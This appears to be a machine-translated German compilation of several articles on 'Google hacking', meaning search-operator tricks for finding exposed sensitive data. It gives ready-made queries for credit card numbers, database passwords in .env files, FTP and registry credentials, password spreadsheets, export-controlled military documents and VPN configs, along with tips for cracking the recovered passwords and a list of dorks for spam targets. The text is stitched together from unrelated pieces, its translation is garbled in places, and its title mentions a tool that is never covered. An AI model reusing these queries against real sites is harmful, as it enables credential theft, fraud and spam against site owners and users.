Anweisungen zur Verwendung von jSQL Injection, einem multifunktionalen Tool zum Auffinden und Ausnutzen von SQL-Injections in Kali Linux. Verwendung der wenig bekannten Funktionen von Google, um versteckte Einsatzmöglichkeiten von Google als CGI-Scanner zu finden

Der Erhalt privater Daten bedeutet nicht immer einen Hackerangriff – manchmal werden sie auch veröffentlicht öffentlicher Zugang. Wissen Google-Einstellungen und mit ein wenig Einfallsreichtum können Sie viele interessante Dinge finden – von Kreditkartennummern bis hin zu FBI-Dokumenten.

WARNUNG Alle Informationen dienen ausschließlich Informationszwecken. Weder die Herausgeber noch der Autor sind für mögliche Schäden verantwortlich, die durch die Materialien dieses Artikels verursacht werden.

Heutzutage ist alles mit dem Internet verbunden, und die Beschränkung des Zugangs ist ihnen egal. Daher werden viele private Daten zur Beute von Suchmaschinen. Spider-Roboter sind nicht mehr auf Webseiten beschränkt, sondern indizieren alle im Web verfügbaren Inhalte und fügen ihren Datenbanken ständig vertrauliche Informationen hinzu. Diese Geheimnisse zu erlernen ist einfach – Sie müssen nur wissen, wie man danach fragt.

Auf der Suche nach Dateien

In kompetenten Händen findet Google schnell alles, was im Web schädlich ist, etwa persönliche Informationen und Dateien für den offiziellen Gebrauch. Sie sind oft wie ein Schlüssel unter einem Teppich versteckt: Es gibt keine wirklichen Zugriffsbeschränkungen, die Daten liegen einfach im hinteren Teil der Website, wohin Links nicht führen. Die Standard-Weboberfläche von Google bietet nur Grundeinstellungen erweiterte Suche, aber auch diese reichen aus.

Es gibt zwei Operatoren, mit denen Sie die Google-Suche auf Dateien eines bestimmten Typs beschränken können: filetype und ext . Der erste legt das Format fest, das die Suchmaschine anhand des Dateiheaders bestimmt, der zweite – die Dateierweiterung, unabhängig von ihrem internen Inhalt. Bei der Suche müssen Sie in beiden Fällen nur die Erweiterung angeben. Anfangs war der ext-Operator praktisch in Fällen zu verwenden, in denen es keine spezifischen Formatfunktionen für die Datei gab (z. B. um nach INI- und CFG-Konfigurationsdateien zu suchen, die alles enthalten können). Jetzt Google-Algorithmen geändert, und es gibt keinen sichtbaren Unterschied zwischen den Operatoren – die Ergebnisse sind in den meisten Fällen die gleichen.


Filtern der Ausgabe

Standardmäßig sucht Google nach Wörtern und allgemein nach allen eingegebenen Zeichen in allen Dateien auf indizierten Seiten. Sie können den Suchbereich nach der Top-Level-Domain, einer bestimmten Site oder nach der Position der gewünschten Sequenz in den Dateien selbst einschränken. Für die ersten beiden Optionen wird die Site-Anweisung verwendet, gefolgt vom Namen der Domain oder der ausgewählten Site. Im dritten Fall ermöglicht Ihnen eine ganze Reihe von Operatoren die Suche nach Informationen in Servicefeldern und Metadaten. Beispielsweise findet allinurl die angegebenen Informationen im Textkörper der Links selbst, allinanchor im Text, der mit dem Tag versehen ist , allintitle – in den Seitenkopfzeilen, allintext – im Hauptteil der Seiten.

Für jeden Operator gibt es eine abgespeckte Version mit einem kürzeren Namen (ohne das Präfix all). Der Unterschied besteht darin, dass allinurl Links mit allen Wörtern findet, während inurl nur Links mit dem ersten Wort findet. Das zweite und die folgenden Wörter der Abfrage können an einer beliebigen Stelle auf Webseiten erscheinen. Der Inurl-Operator unterscheidet sich auch von einer anderen ähnlichen Bedeutung - Site. Mit der ersten Funktion können Sie auch eine beliebige Zeichenfolge im Link zum gewünschten Dokument finden (z. B. /cgi-bin/), die häufig zum Auffinden von Komponenten mit bekannten Schwachstellen verwendet wird.

Versuchen wir es in der Praxis. Wir nehmen den Allintext-Filter und sorgen dafür, dass die Abfrage eine Liste mit Kreditkartennummern und Verifizierungscodes zurückgibt, die erst nach zwei Jahren ablaufen (oder wenn ihre Besitzer es satt haben, alle nacheinander zu füttern).

Allintext: Ablaufdatum der Kartennummer / Lebenslauf 2017

Wenn man in den Nachrichten liest, dass sich ein junger Hacker „in die Server“ des Pentagons oder der NASA gehackt und geheime Informationen gestohlen hat, dann handelt es sich in den meisten Fällen um genau diese elementare Technik der Nutzung von Google. Angenommen, wir interessieren uns für eine Liste der NASA-Mitarbeiter und deren Kontaktdaten. Sicherlich liegt eine solche Liste in elektronischer Form vor. Der Einfachheit halber oder wegen eines Versehens kann es auch auf der Website der Organisation selbst liegen. Es ist logisch, dass in diesem Fall keine Verweise darauf erfolgen, da es für den internen Gebrauch bestimmt ist. Welche Wörter können in einer solchen Datei enthalten sein? Zumindest - das Feld "Adresse". Alle diese Annahmen lassen sich leicht überprüfen.


inurl:nasa.gov Dateityp:xlsx „Adresse“


Wir nutzen Bürokratie

Solche Funde sind eine angenehme Kleinigkeit. Der wirklich solide Haken ergibt sich aus einer detaillierteren Kenntnis der Google Webmaster-Operatoren, des Webs selbst und der Struktur dessen, wonach Sie suchen. Wenn Sie die Details kennen, können Sie die Ausgabe einfach filtern und die Eigenschaften der benötigten Dateien verfeinern, um im Rest wirklich wertvolle Daten zu erhalten. Komisch, dass hier die Bürokratie Abhilfe schafft. Es werden typische Formulierungen erstellt, die die Suche nach geheimen Informationen, die versehentlich ins Web gelangt sind, erleichtern.

Beispielsweise bedeutet der im Büro des US-Verteidigungsministeriums obligatorische Stempel „Distribution Statement“ standardisierte Einschränkungen bei der Verteilung eines Dokuments. Der Buchstabe A kennzeichnet öffentliche Veröffentlichungen, in denen es nichts Geheimnisvolles gibt; B – nur für den internen Gebrauch bestimmt, C – streng vertraulich und so weiter bis F. Separat gibt es den Buchstaben X, der besonders wertvolle Informationen kennzeichnet, die ein Staatsgeheimnis auf höchstem Niveau darstellen. Lassen Sie diejenigen, die es im Dienst tun sollen, nach solchen Dokumenten suchen, und wir beschränken uns auf Dateien mit dem Buchstaben C. Gemäß DoDI 5230.24 wird eine solche Kennzeichnung Dokumenten zugewiesen, die eine Beschreibung kritischer Technologien enthalten, die unter die Exportkontrolle fallen. Solche sorgfältig gehüteten Informationen finden Sie auf Websites der der US-Armee zugewiesenen Top-Level-Domain .mil.

„VERTEILERKLÄRUNG C“ inurl:navy.mil

Es ist sehr praktisch, dass in der .mil-Domain nur Websites des US-Verteidigungsministeriums und seiner Vertragsorganisationen gesammelt werden. Domainbeschränkte Suchergebnisse sind außergewöhnlich sauber und die Titel sprechen für sich. Es ist praktisch sinnlos, auf diese Weise nach russischen Geheimnissen zu suchen: In den Domänen .ru und .rf herrscht Chaos, und die Namen vieler Waffensysteme klingen botanisch (PP „Kiparis“, selbstfahrende Waffen „Acacia“) oder sogar fabelhaft (TOS „Pinocchio“).


Wenn Sie jedes Dokument einer Website in der .mil-Domain sorgfältig untersuchen, können Sie andere Markierungen sehen, um Ihre Suche zu verfeinern. Beispielsweise ein Verweis auf die Exportbeschränkungen „Sec 2751“, der auch bei der Suche nach interessanten technischen Informationen praktisch ist. Von Zeit zu Zeit wird es von offiziellen Websites entfernt, auf denen es einmal aufgetaucht ist. Wenn Sie also einem interessanten Link in den Suchergebnissen nicht folgen können, verwenden Sie den Google-Cache (Cache-Operator) oder die Internet Archive-Website.

Wir steigen in die Wolken

Neben versehentlich freigegebenen Dokumenten von Regierungsstellen tauchen im Google-Cache gelegentlich auch Links zu persönlichen Dateien von Dropbox und anderen Datenspeicherdiensten auf, die „private“ Links zu öffentlich veröffentlichten Daten erstellen. Noch schlimmer ist es bei alternativen und selbstgemachten Diensten. Die folgende Abfrage findet beispielsweise die Daten aller Verizon-Clients, auf denen ein FTP-Server installiert ist und die aktiv einen Router auf ihrem Router verwenden.

Allinurl:ftp://verizon.net

Mittlerweile gibt es mehr als vierzigtausend solcher klugen Köpfe, im Frühjahr 2015 waren es noch eine Größenordnung mehr. Anstelle von Verizon.net können Sie auch den Namen eines beliebigen bekannten Anbieters verwenden. Je bekannter dieser ist, desto größer kann der Haken sein. Über den integrierten FTP-Server können Sie Dateien auf einem externen Laufwerk sehen, das mit dem Router verbunden ist. Normalerweise handelt es sich dabei um ein NAS für Remote-Arbeit, eine persönliche Cloud oder eine Art Peer-to-Peer-Dateidownload. Der gesamte Inhalt solcher Medien wird von Google und anderen Suchmaschinen indiziert, sodass Sie über einen direkten Link auf Dateien zugreifen können, die auf externen Laufwerken gespeichert sind.

Peeping-Konfigurationen

Vor der umfassenden Migration in die Clouds dominierten einfache FTP-Server als Remote-Speicher, die ebenfalls keine Schwachstellen aufwiesen. Viele davon sind auch heute noch relevant. Das beliebte Programm WS_FTP Professional speichert beispielsweise Konfigurationsdaten, Benutzerkonten und Passwörter in der Datei ws_ftp.ini. Es ist leicht zu finden und zu lesen, da alle Einträge im Klartext gespeichert werden und Passwörter mit dem Triple DES-Algorithmus nach minimaler Verschleierung verschlüsselt werden. In den meisten Versionen reicht es aus, einfach das erste Byte zu verwerfen.

Das Entschlüsseln solcher Passwörter ist mit dem Dienstprogramm WS_FTP Password Decryptor oder einem kostenlosen Webdienst einfach.

Wenn es um das Hacken einer beliebigen Website geht, meint man damit in der Regel das Erhalten eines Passworts aus Protokollen und Backups von CMS- oder E-Commerce-Anwendungskonfigurationsdateien. Wenn Sie ihre typische Struktur kennen, können Sie sie leicht angeben Stichworte. Zeilen wie die in ws_ftp.ini sind äußerst häufig. Drupal und PrestaShop haben beispielsweise immer eine Benutzer-ID (UID) und ein entsprechendes Passwort (pwd) und alle Informationen werden in Dateien mit der Erweiterung .inc gespeichert. Sie können wie folgt danach suchen:

"pwd=" "UID=" ext:inc

Wir enthüllen Passwörter aus dem DBMS

In den Konfigurationsdateien von SQL-Servern Namen und Adressen Email Benutzer werden im Klartext gespeichert und ihre MD5-Hashes werden anstelle von Passwörtern geschrieben. Streng genommen ist es unmöglich, sie zu entschlüsseln, aber Sie können eine Übereinstimmung zwischen bekannten Hash-Passwort-Paaren finden.

Bisher gibt es DBMS, die nicht einmal Passwort-Hashing verwenden. Die Konfigurationsdateien von jedem von ihnen können einfach im Browser angezeigt werden.

Intext:DB_PASSWORD Dateityp:env

Mit dem Aufkommen von Windows-Servern wurde der Platz der Konfigurationsdateien teilweise von der Registrierung eingenommen. Sie können die Zweige auf genau die gleiche Weise durchsuchen, indem Sie reg als Dateityp verwenden. Zum Beispiel so:

Dateityp:reg HKEY_CURRENT_USER „Passwort“=

Vergessen Sie nicht das Offensichtliche

Manchmal ist es möglich, mithilfe von Daten, die versehentlich von Google geöffnet und erfasst wurden, an Verschlusssachen zu gelangen. Die ideale Option besteht darin, eine Liste von Passwörtern in einem gängigen Format zu finden. Kontoinformationen speichern in Textdatei, Word-Datei oder elektronisch Excel Tabelle Das können nur verzweifelte Menschen, aber davon gibt es immer genug.

Dateityp:xls inurl:passwort

Einerseits gibt es viele Möglichkeiten, solche Vorfälle zu verhindern. Es ist notwendig, ausreichende Zugriffsrechte in htaccess festzulegen, das CMS zu patchen, keine linken Skripte zu verwenden und andere Lücken zu schließen. Es gibt auch eine Datei mit einer robots.txt-Ausschlussliste, die Suchmaschinen daran hindert, die darin angegebenen Dateien und Verzeichnisse zu indizieren. Wenn andererseits die robots.txt-Struktur auf einem Server von der Standardstruktur abweicht, wird sofort klar, was sie darauf verbergen wollen.

Der Liste der Verzeichnisse und Dateien auf jeder Site wird der standardmäßige Beschriftungsindex von vorangestellt. Da es zu Servicezwecken im Titel erscheinen muss, ist es sinnvoll, die Suche auf den Operator „intitle“ zu beschränken. Interessante Dinge finden sich in den Verzeichnissen /admin/, /personal/, /etc/ und sogar /secret/.

Verfolgen Sie die Aktualisierungen

Relevanz ist hier enorm wichtig: Alte Schwachstellen werden nur sehr langsam geschlossen, Google und seine Suchergebnisse verändern sich jedoch ständig. Es gibt sogar einen Unterschied zwischen dem „Last Second“-Filter (&tbs=qdr:s am Ende der Anfrage-URL) und dem „Echtzeit“-Filter (&tbs=qdr:1).

Datumszeitraum neuestes Update Auch auf die Datei von Google wird implizit hingewiesen. Über die grafische Weboberfläche können Sie einen der typischen Zeiträume (Stunde, Tag, Woche usw.) auswählen oder einen Datumsbereich festlegen, diese Methode ist jedoch nicht für die Automatisierung geeignet.

Anhand des Erscheinungsbilds der Adressleiste lässt sich nur erahnen, wie sich die Ergebnisausgabe mithilfe des Konstrukts &tbs=qdr: einschränken lässt. Der Buchstabe y dahinter gibt eine Grenze von einem Jahr an (&tbs=qdr:y), m zeigt die Ergebnisse für den letzten Monat, w für die Woche, d für den vergangenen Tag, h für die letzte Stunde, n für die Minute, und s für die, gib mir eine Sekunde. Die neuesten Ergebnisse, die Google gerade bekannt gegeben wurden, werden mit dem Filter &tbs=qdr:1 gefunden.

Wenn Sie ein kniffliges Skript schreiben müssen, ist es hilfreich zu wissen, dass der Datumsbereich in Google im Julian-Format über den Datumsbereichsoperator angegeben wird. So finden Sie beispielsweise eine Liste von PDF-Dokumenten mit dem Wort „vertraulich“, die zwischen dem 1. Januar und dem 1. Juli 2015 hochgeladen wurden.

Vertraulicher Dateityp: PDF-Datumsbereich: 2457024-2457205

Der Bereich wird im Julianischen Datumsformat ohne Dezimalstellen angegeben. Es ist umständlich, sie manuell aus dem gregorianischen Kalender zu übersetzen. Es ist einfacher, einen Datumskonverter zu verwenden.

Nochmals zielen und filtern

Neben der Angabe zusätzlicher Operatoren in der Suchanfrage können diese auch direkt im Link-Body mitgesendet werden. Beispielsweise entspricht das Merkmal filetype:pdf dem Konstrukt as_filetype=pdf. Daher ist es bequem, etwaige Klarstellungen vorzunehmen. Nehmen wir an, dass die Ausgabe von Ergebnissen nur aus der Republik Honduras durch Hinzufügen der Konstruktion cr=countryHN zur Such-URL festgelegt wird, jedoch nur aus der Stadt Bobruisk - gcs=Bobruisk . Eine vollständige Liste finden Sie im Abschnitt „Entwickler“.

Die Automatisierungstools von Google sollen das Leben einfacher machen, erhöhen aber oft den Aufwand. Beispielsweise wird die Stadt eines Benutzers anhand der IP des Benutzers über WHOIS ermittelt. Basierend auf diesen Informationen gleicht Google nicht nur die Last zwischen den Servern aus, sondern ändert auch die Suchergebnisse. Abhängig von der Region werden für dieselbe Abfrage unterschiedliche Ergebnisse auf der ersten Seite angezeigt, und einige davon werden möglicherweise vollständig ausgeblendet. Fühlen Sie sich wie ein Kosmopolit und suchen Sie nach Informationen aus einem beliebigen Land. Der aus zwei Buchstaben bestehende Code nach der Direktive gl=country hilft Ihnen dabei. Der Code für die Niederlande lautet beispielsweise NL, während der Vatikan und Nordkorea keinen eigenen Code in Google haben.

Oft sind die Suchergebnisse auch nach Verwendung einiger erweiterter Filter überfüllt. In diesem Fall lässt sich die Abfrage leicht verfeinern, indem man ihr einige Ausnahmewörter hinzufügt (jedem davon ist ein Minuszeichen vorangestellt). Beispielsweise werden „banking“, „names“ und „tutorial“ häufig mit dem Wort „Persönlich“ verwendet. Daher wird in saubereren Suchergebnissen kein Lehrbuchbeispiel einer Suchanfrage angezeigt, sondern ein verfeinertes:

Intitle:"Index of /Personal/" -names -tutorial -banking

Letztes Beispiel

Ein anspruchsvoller Hacker zeichnet sich dadurch aus, dass er sich selbst mit allem versorgt, was er braucht. Ein VPN ist beispielsweise eine praktische Sache, aber entweder teuer oder temporär und mit Einschränkungen verbunden. Sich alleine anzumelden ist zu teuer. Es ist gut, dass es Gruppenabonnements gibt, aber mit Google Es ist einfach, Teil einer Gruppe zu sein. Suchen Sie dazu einfach die Cisco VPN-Konfigurationsdatei, die eine eher ungewöhnliche PCF-Erweiterung und einen erkennbaren Pfad hat: Program Files\Cisco Systems\VPN Client\Profiles . Eine Anfrage genügt, und Sie schließen sich zum Beispiel den freundlichen Mitarbeiterinnen und Mitarbeitern der Universität Bonn an.

Dateityp: PCF VPN ODER Gruppe

INFO Google findet Konfigurationsdateien mit Passwörtern, viele davon sind jedoch verschlüsselt oder durch Hashes ersetzt. Wenn Sie Zeichenfolgen mit fester Länge sehen, suchen Sie sofort nach einem Entschlüsselungsdienst.

Die Passwörter werden verschlüsselt gespeichert, Maurice Massard hat jedoch bereits ein Programm zum Entschlüsseln geschrieben und stellt es kostenlos über thecampusgeeks.com zur Verfügung.

Mit Hilfe von Google werden Hunderte verschiedener Angriffsarten und Penetrationstests durchgeführt. Es gibt viele Optionen, die sich auf beliebte Programme, wichtige Datenbankformate, zahlreiche PHP-Schwachstellen, Clouds usw. auswirken. Wenn Sie genau angeben, was Sie suchen, wird es die Beschaffung erheblich vereinfachen notwendige Informationen(insbesondere eines, dessen Veröffentlichung nicht geplant war). Kein Shodan-Single nährt interessante Ideen, sondern jede Datenbank mit indizierten Netzwerkressourcen!

So suchen Sie mit google.com

Wahrscheinlich weiß jeder, wie man eine Suchmaschine wie Google nutzt =) Aber nicht jeder weiß das, wenn man richtig schreibt Suchanfrage Mit Hilfe spezieller Designs können Sie viel effizienter und schneller zu den gewünschten Ergebnissen gelangen =) In diesem Artikel werde ich versuchen zu zeigen, was und wie Sie tun müssen, um richtig zu suchen

Google unterstützt mehrere erweiterte Suchoperatoren, die bei der Suche auf google.com von besonderer Bedeutung sind. Normalerweise ändern diese Operatoren die Suche oder weisen Google sogar an, völlig andere Suchtypen durchzuführen. Beispielsweise ist das link:-Konstrukt ein spezieller Operator und die Abfrage Link:www.google.com führt keine normale Suche durch, sondern findet stattdessen alle Webseiten, die Links zu google.com haben.
alternative Anfragetypen

Cache: Wenn Sie andere Wörter in die Abfrage aufnehmen, hebt Google die enthaltenen Wörter im zwischengespeicherten Dokument hervor.
Zum Beispiel, Cache:www.website zeigt zwischengespeicherten Inhalt mit hervorgehobenem Wort „Web“ an.

Link: Die obige Suchanfrage zeigt Webseiten an, die Links zur angegebenen Suchanfrage enthalten.
Zum Beispiel: Link:www.website zeigt alle Seiten an, die einen Link zu http://www.site haben

verwandt: Zeigt Webseiten an, die mit der angegebenen Webseite „verwandt“ sind.
Zum Beispiel, Verwandte: www.google.com listet Webseiten auf, die ähnlich sind Startseite Google.

info: Informationen anfordern: stellt einige Informationen bereit, die Google über die angeforderte Webseite hat.
Zum Beispiel, info:website zeigt Informationen über unser Forum =) (Armada - Forum erwachsener Webmaster).

Sonstige Informationsanfragen

define: Die define:-Abfrage liefert eine Definition der Wörter, die Sie danach eingeben, zusammengestellt aus verschiedenen Online-Quellen. Die Definition gilt für die gesamte eingegebene Phrase (d. h. sie umfasst alle Wörter in der genauen Abfrage).

Aktien: Wenn Sie eine Abfrage mit Aktien starten: Google behandelt die restlichen Suchbegriffe als Börsenticker und verlinkt zu einer Seite mit den vorbereiteten Informationen für diese Zeichen.
Zum Beispiel, Aktien: Intel Yahoo zeigt Informationen über Intel und Yahoo an. (Beachten Sie, dass Sie die Zeichen für aktuelle Nachrichten drucken müssen, nicht den Firmennamen.)

Anforderungsmodifikatoren

site: Wenn Sie site: in Ihre Abfrage einbeziehen, beschränkt Google die Ergebnisse auf die Websites, die es in dieser Domain findet.
Sie können auch nach einzelnen Zonen wie ru, org, com usw. suchen ( site:com site:ru)

allintitle: Wenn Sie eine Abfrage mit allintitle: ausführen, begrenzt Google die Ergebnisse auf alle Abfragewörter im Titel.
Zum Beispiel, allintitle: Google-Suche gibt alle Google-Suchseiten wie Bilder, Blog usw. zurück

intitle: Wenn Sie intitle: in Ihre Abfrage einschließen, beschränkt Google die Ergebnisse auf Dokumente, die dieses Wort im Titel enthalten.
Zum Beispiel, Titel:Geschäft

allinurl: Wenn Sie eine Abfrage mit allinurl ausführen: Google schränkt die Ergebnisse auf alle Abfragewörter in der URL ein.
Zum Beispiel, allinurl: Google-Suche Gibt Dokumente mit Google zurück und sucht im Titel. Optional können Sie Wörter auch durch einen Schrägstrich (/) trennen. Dann werden die Wörter auf beiden Seiten des Schrägstrichs auf derselben Seite gesucht: Beispiel allinurl: foo/bar

inurl: Wenn Sie inurl: in Ihre Abfrage aufnehmen, beschränkt Google die Ergebnisse auf Dokumente, die dieses Wort in der URL enthalten.
Zum Beispiel, Animation inurl:website

intext: sucht nur im Text der Seite nach dem angegebenen Wort und ignoriert dabei den Titel und die Texte von Links sowie andere Dinge, die nichts damit zu tun haben. Es gibt auch eine Ableitung dieses Modifikators – allintext: d. h. Darüber hinaus werden alle Wörter in der Abfrage nur im Text durchsucht, was ebenfalls wichtig ist, da häufig verwendete Wörter in Links ignoriert werden
Zum Beispiel, intext:forum

Datumsbereich: Sucht in Zeitrahmen (Datumsbereich: 2452389-2452389), Datumsangaben für Uhrzeiten werden im julianischen Format angegeben.

Nun, und alle möglichen interessanten Beispiele für Anfragen

Beispiele für die Zusammenstellung von Abfragen für Google. Für Spammer

inurl:control.guest?a=sign

Site:books.dreambook.com „Homepage-URL“ „Sign my“ inurl:sign

Website: www.freegb.net Homepage

Inurl:sign.asp „Anzahl der Zeichen“

„Nachricht:“ inurl:sign.cfm „Absender:“

inurl:register.php „Benutzerregistrierung“ „Website“

Inurl:edu/guestbook „Tragen Sie sich ins Gästebuch ein“

Inurl:post „Kommentar posten“ „URL“

Inurl:/archives/ „Kommentare:“ „Informationen merken?“

„Skript und Gästebuch erstellt von:“ „URL:“ „Kommentare:“

inurl:?action=add „phpBook“ „URL“

Titel: „Neue Geschichte einreichen“

Zeitschriften

inurl:www.livejournal.com/users/mode=reply

inurl greatjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? „Gästebuch“

Blogs

Inurl:blogger.com/comment.g?“postID“„anonym“

Inurl:typepad.com/ „Kommentar posten“ „Persönliche Daten merken?“

Inurl:greatestjournal.com/community/ „Kommentar posten“ „Adressen anonymer Poster“

„Kommentar posten“ „Adressen anonymer Poster“ –

Titel: „Kommentar posten“

Inurl:pirillo.com „Kommentar posten“

Foren

Inurl:gate.html?“name=Forums“ „mode=reply“

inurl:“forum/posting.php?mode=reply“

inurl:“mes.php?“

inurl:“members.html“

inurl:forum/memberlist.php?“

Hacken mit Google

Alexander Antipow

Suchmaschine Google (www.google.com) bietet viele Suchmöglichkeiten. Alle diese Funktionen sind ein unschätzbares Suchwerkzeug für einen erstmaligen Internetnutzer und gleichzeitig eine noch mächtigere Waffe der Invasion und Zerstörung in den Händen von Menschen mit bösen Absichten, darunter nicht nur Hacker, sondern auch Nicht-Computerkriminelle und sogar Terroristen.
(9475 Aufrufe in 1 Woche)


Denis Batrankow
denisNOSPAMixi.ru

Aufmerksamkeit: Dieser Artikel ist keine Anleitung zum Handeln. Dieser Artikel wurde für Sie, WEB-Server-Administratoren, geschrieben, damit Sie das falsche Gefühl verlieren, sicher zu sein, und endlich die Heimtücke dieser Methode der Informationsbeschaffung verstehen und sich an den Schutz Ihrer Website machen.

Einführung

Ich habe zum Beispiel 1670 Seiten in 0,14 Sekunden gefunden!

2. Geben Sie eine andere Zeichenfolge ein, zum Beispiel:

inurl:"auth_user_file.txt"

etwas weniger, aber das reicht schon zum kostenlosen Download und zum Erraten von Passwörtern (mit dem gleichen John The Ripper). Im Folgenden werde ich einige weitere Beispiele nennen.

Sie müssen sich also darüber im Klaren sein, dass die Suchmaschine Google die meisten Internetseiten besucht und die darauf enthaltenen Informationen zwischengespeichert hat. Mithilfe dieser zwischengespeicherten Informationen können Sie Informationen über die Website und den Inhalt der Website abrufen, ohne eine direkte Verbindung zur Website herzustellen, indem Sie einfach die intern von Google gespeicherten Informationen durchsuchen. Wenn die Informationen auf der Website nicht mehr verfügbar sind, bleiben die Informationen im Cache möglicherweise weiterhin erhalten. Für diese Methode ist lediglich die Kenntnis einiger Google-Keywords erforderlich. Diese Technik wird Google Hacking genannt.

Vor drei Jahren tauchten erstmals Informationen über Google Hacking auf der Mailingliste Bugtruck auf. Im Jahr 2001 wurde dieses Thema von einem französischen Studenten angesprochen. Hier ist ein Link zu diesem Brief: http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Es gibt erste Beispiele für solche Anfragen:

1) Index von /admin
2) Index von /password
3) Index von /mail
4) Index von / +banques +filetype:xls (für Frankreich...)
5) Index von / +passwd
6) Index von/password.txt

Dieses Thema sorgte kürzlich im englischsprachigen Teil des Internets für großes Aufsehen: nach einem Artikel von Johnny Long, der am 7. Mai 2004 veröffentlicht wurde. Für eine umfassendere Untersuchung des Google-Hackings empfehle ich Ihnen, die Website dieses Autors zu besuchen: http://johnny.ihackstuff.com. In diesem Artikel möchte ich Sie nur auf den neuesten Stand bringen.

Wer kann es nutzen:
- Journalisten, Spione und alle, die gerne in fremde Angelegenheiten stecken, können damit nach kompromittierenden Beweisen suchen.
- Hacker suchen nach geeigneten Angriffszielen.

So funktioniert Google.

Um das Gespräch fortzusetzen, möchte ich Sie an einige der in Google-Abfragen verwendeten Schlüsselwörter erinnern.

Suchen Sie mit dem +-Zeichen

Google schließt seiner Meinung nach unwichtige Wörter von der Suche aus. Zum Beispiel Fragewörter, Präpositionen und Artikel in Englische Sprache: zum Beispiel sind, von, wo. Im Russischen scheint Google alle Wörter für wichtig zu halten. Wird das Wort von der Suche ausgeschlossen, schreibt Google darüber. Damit Google nach Seiten mit diesen Wörtern suchen kann, müssen Sie vor ihnen ein +-Zeichen ohne Leerzeichen vor dem Wort einfügen. Zum Beispiel:

Ass + der Basis

Suche nach Zeichen -

Wenn Google findet große Menge Seiten, von denen Sie Seiten mit bestimmten Themen ausschließen möchten, können Sie Google zwingen, nur nach Seiten zu suchen, die bestimmte Wörter nicht enthalten. Dazu müssen Sie diese Wörter kennzeichnen, indem Sie jeweils ein Zeichen voranstellen – ohne Leerzeichen vor dem Wort. Zum Beispiel:

Angeln - Wodka

Suchen Sie mit dem ~-Zeichen

Möglicherweise möchten Sie nicht nur das angegebene Wort, sondern auch seine Synonyme nachschlagen. Stellen Sie dazu dem Wort das Symbol ~ voran.

Finden einer genauen Phrase mithilfe von doppelten Anführungszeichen

Google sucht auf jeder Seite nach allen Vorkommen der Wörter, die Sie in die Abfragezeichenfolge geschrieben haben, und kümmert sich dabei nicht um die relative Position der Wörter. Hauptsache ist, dass sich alle angegebenen Wörter gleichzeitig auf der Seite befinden ( Dies ist die Standardaktion). Finden exakte Formulierung- Es muss in Anführungszeichen gesetzt werden. Zum Beispiel:

„Buchstütze“

Um mindestens eines der angegebenen Wörter zu haben, müssen Sie angeben logische Operation explizit: ODER. Zum Beispiel:

Buchsicherheit ODER Schutz

Darüber hinaus können Sie das *-Zeichen in der Suchzeichenfolge verwenden, um ein beliebiges Wort und zu kennzeichnen. um einen beliebigen Charakter darzustellen.

Wörter mit zusätzlichen Operatoren finden

Es gibt Suchoperatoren, die in der Suchzeichenfolge im folgenden Format angegeben werden:

Operator:Suchbegriff

Die Leerzeichen neben dem Doppelpunkt werden nicht benötigt. Wenn Sie nach einem Doppelpunkt ein Leerzeichen einfügen, wird eine Fehlermeldung angezeigt, und davor verwendet Google diese als normale Suchzeichenfolge.
Es gibt Gruppen zusätzlicher Suchoperatoren: Sprachen – geben Sie an, in welcher Sprache Sie das Ergebnis sehen möchten, Datum – beschränken Sie die Ergebnisse auf die letzten drei, sechs oder zwölf Monate, Vorkommen – geben Sie an, wo im Dokument Sie suchen müssen die Zeichenfolge: überall, im Titel, in der URL, Domains – nach der angegebenen Site suchen oder umgekehrt sie von der Suche ausschließen, Sichere Suche- Blockieren Sie Websites, die die angegebene Art von Informationen enthalten, und entfernen Sie sie von den Suchergebnisseiten.
Gleichzeitig benötigen einige Operatoren keinen zusätzlichen Parameter, beispielsweise kann die Abfrage „cache:www.google.com“ als vollwertige Suchzeichenfolge aufgerufen werden, während einige Schlüsselwörter im Gegenteil die Anwesenheit erfordern eines Suchbegriffs, zum Beispiel „site:www.google.com help“. Lassen Sie uns im Lichte unseres Themas einen Blick darauf werfen folgende Aussagen:

Operator

Beschreibung

Erfordert ein zusätzlicher Parameter?

Suchen Sie nur nach der in search_term angegebenen Site

Suche nur in Dokumenten mit dem Typ search_term

Suchen Sie nach Seiten, die „search_term“ im Titel enthalten

Suchen Sie nach Seiten, die alle Wörter „search_term“ im Titel enthalten

Suchen Sie nach Seiten, die das Wort search_term in ihrer Adresse enthalten

Finden Sie Seiten, die alle Wörter „search_term“ in ihrer Adresse enthalten

Der site:-Operator beschränkt die Suche nur auf die angegebene Site, und Sie können mehr als angeben Domainname sondern auch die IP-Adresse. Geben Sie beispielsweise Folgendes ein:

Die filetype:-Anweisung beschränkt die Suche auf Dateien eines bestimmten Typs. Zum Beispiel:

Zum Zeitpunkt der Veröffentlichung dieses Artikels kann Google in 13 verschiedenen Dateiformaten suchen:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (Woche 1, Woche 2, Woche 3, Woche 4, Woche 5, Woche Ki, Woche Woche, Woche Woche)
  • Lotus Word Pro (lwp)
  • MacWrite(mw)
  • Microsoft Excel(xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(Dokument)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich-Text-Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Link: Zeigt alle Seiten an, die auf die angegebene Seite verweisen.
Es muss immer interessant sein zu sehen, wie viele Orte im Internet über Sie wissen. Wir versuchen:

Cache-Anweisung: Zeigt die Google-Cache-Version der Website an, wie sie zu dem Zeitpunkt aussah Google neueste habe diese Seite einmal besucht. Wir nehmen jede sich häufig ändernde Website und schauen:

Der intitle:-Operator sucht nach dem angegebenen Wort im Titel der Seite. Der allintitle:-Operator ist eine Erweiterung – er sucht nach allen angegebenen mehreren Wörtern im Seitentitel. Vergleichen:

Titel: Flug zum Mars
intitle:flight intitle:on intitle:mars
allintitle:Flug zum Mars

Der inurl-Operator: bewirkt, dass Google alle Seiten anzeigt, die die angegebene Zeichenfolge in der URL enthalten. allinurl: sucht nach allen Wörtern in einer URL. Zum Beispiel:

allinurl:acid_stat_alerts.php

Dieser Befehl ist besonders nützlich für diejenigen, die SNORT nicht haben – sie können zumindest sehen, wie es auf einem echten System funktioniert.

Google-Hacking-Methoden

